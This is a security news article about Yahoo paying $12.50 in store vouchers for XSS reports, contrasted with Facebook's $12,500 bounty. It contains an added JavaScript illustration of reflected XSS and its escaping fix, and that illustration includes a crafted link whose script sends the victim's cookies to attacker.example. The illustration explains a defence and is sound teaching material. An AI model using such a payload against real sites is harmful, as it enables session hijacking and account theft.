Finding vulnerabilities can be a profitable business – even if you work for the right side of the law. Last month, Facebook paid out $12,500 to a researcher for finding a bug – this month, Yahoo! paid out $12.50.
Yahoo!’s more modest “Bug Bounty” was not even paid in money – it came in the form of vouchers for Yahoo!’s corporate store, where fans can buy purple hats, T-shirts, and a desk toy that yodels “Yahoo!” The payout has been widely mocked, according to The Inquirer.
Many companies – including internet giants such as Google and Mozilla – rely on “bug bounty” programmes as a cost-effective way of finding flaws. Most researchers don’t earn the equivalent of a salary – but the thought of a “big” bounty keeps people interested, according to a recent UC Berkeley study.
But Yahoo’s bounties don’t offer much of an incentive, says Ilia Kolochenko, CEO of Swiss firm High-Tech Bridge. Kolochenko claims that he and his team decided to “test” Yahoo’s programme by sending in vulnerabilities – but that their first was rejected as “not new”, having already been reported by another researcher.
“By Monday the 23rd of September the Yahoo Security Team was notified of 3 more XSS vulnerabilities affecting the ecom.yahoo.com and adserver.yahoo.com domains. Each of the discovered vulnerabilities allowed any @yahoo.com email account to be compromised simply by sending a specially crafted link to a logged-in Yahoo user and making him/her click on it,” Kolochenko says.
“This time Yahoo took 48 hours to reply, and only about two XSS affecting adserver.yahoo.com. Yahoo warmly thanked us for reporting the vulnerabilities and offered us… 12.50 USD (twelve dollars and fifty cents) reward per one vulnerability. Moreover, this sum was given as a discount code.”
Kolochenko says: “Yahoo should probably revise their relations with security researchers. Paying several dollars per vulnerability is a bad joke and won’t motivate people to report security vulnerabilities to them, especially when such vulnerabilities can be easily sold on the black market for a much higher price.”
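The bug class Kolochenko describes above is reflected cross-site scripting: a page echoes part of the URL back into its HTML without escaping, so a link carrying script in that parameter runs in whoever clicks it, inside their logged-in session. The following is an added illustration of that pattern and of the usual fix, not code from the article, from Yahoo or from High-Tech Bridge; the hostnames, the search endpoint and the `q` parameter are hypothetical.

```javascript
// Added illustration of reflected XSS and its fix. Hypothetical endpoint,
// parameter and hostnames; this is not Yahoo's code or the reported bug.

// Minimal HTML escaping for a value placed inside an element body or
// a quoted attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the query parameter is echoed into the page unescaped, so any
// HTML (including <script>) carried in the URL executes in the visitor's
// session on this origin.
function renderSearchPageVulnerable(q) {
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// Hardened: same page, but the untrusted value is escaped before insertion,
// so the browser renders it as text instead of markup.
function renderSearchPageSafe(q) {
  return `<html><body><h1>Results for: ${escapeHtml(q)}</h1></body></html>`;
}

// Pull the reflected parameter out of a link the way a server would.
function queryFromLink(url) {
  return new URL(url).searchParams.get("q") ?? "";
}

// Crude check for a live <script> element in rendered HTML.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed example of a "specially crafted link" (hypothetical hosts):
// the payload sends the victim's cookies to a host the attacker controls.
const CRAFTED_LINK =
  "https://shop.example.com/search?q=" +
  encodeURIComponent(
    '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
  );

// Render the same crafted input through both versions of the page.
function demo() {
  const q = queryFromLink(CRAFTED_LINK);
  return {
    vulnerable: containsScriptTag(renderSearchPageVulnerable(q)),
    hardened: containsScriptTag(renderSearchPageSafe(q)),
  };
}

console.log(demo()); // { vulnerable: true, hardened: false }
```

Output escaping is the primary fix; marking the session cookie `HttpOnly` is a worthwhile second layer, since `document.cookie` cannot read such cookies, but it does not stop script on the page from issuing requests in the victim's session.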
Yahoo has recently come under fire for bad security practice in recycling old email addresses – with “new” users complaining of receiving personal emails intended for the old owners – including wedding invitations.
Last month, a bug which allowed any Facebook user to delete photos from any other user’s page without their knowledge has earned its discoverer $12,500 under Facebook’s “bug bounty” program – more than 10 times the average payout.
Arul Kumar, 21, demonstrated the bug in a video where he almost – but not quite – deleted a video from Mark Zuckerberg’s photo page.
Author Rob Waugh, We Live Security